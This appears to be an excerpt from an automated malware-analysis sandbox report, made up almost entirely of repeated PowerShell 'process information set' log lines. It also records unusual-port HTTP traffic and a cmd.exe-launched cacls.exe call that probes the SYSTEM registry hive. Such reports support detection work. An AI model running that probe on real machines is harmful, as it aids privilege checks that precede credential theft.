    Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 1490 -> 49710
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
